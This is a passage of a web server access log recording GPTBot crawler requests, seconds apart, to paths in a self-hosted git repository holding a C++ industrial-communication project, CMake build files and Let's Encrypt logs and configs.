GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:56:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:15:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot" +[17/Feb/2026:15:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21651] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21648] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10239] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13927] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:15:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:15:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:15:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:15:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11719] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:15:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:15:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11694] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:15:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:15:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11720] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:15:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:15:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11711] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:15:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:15:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12792] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11419] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" +[17/Feb/2026:15:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11418] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" +[17/Feb/2026:15:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15358] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13526] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11208] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11207] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15359] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10948] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" +[17/Feb/2026:15:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11418] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" +[17/Feb/2026:15:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13525] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12303] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:15:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16098] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:15:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13452] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:15:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16099] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:15:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13454] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:15:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10478] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:56:43 +0000] - 200 200 - GET https 